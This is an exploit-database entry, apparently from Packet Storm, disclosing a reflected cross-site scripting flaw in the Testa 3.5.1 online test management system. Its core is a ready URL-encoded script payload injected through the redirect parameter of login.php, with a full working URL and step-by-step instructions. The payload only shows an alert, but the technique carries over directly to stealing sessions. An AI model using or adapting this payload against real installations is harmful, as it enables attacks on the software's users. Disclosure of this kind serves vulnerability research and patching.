Exploit for Testa 3.5.1 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:168474
# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)  
# Date: 28/08/2022  
# Exploit Author: Ashkan Moghaddas  
# Vendor Homepage: https://testa.cc  
# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip  
# Version: 3.5.1  
# Tested on: Windows/Linux  
  
# Proof of Concept:  
# 1- Install Testa 3.5.1  
# 2- Go to https://localhost.com/login.php?redirect=XXXX  
# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E  
# 4- XSS has been triggered.  
  
# Go to this url "  
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E  
"  
XSS will trigger.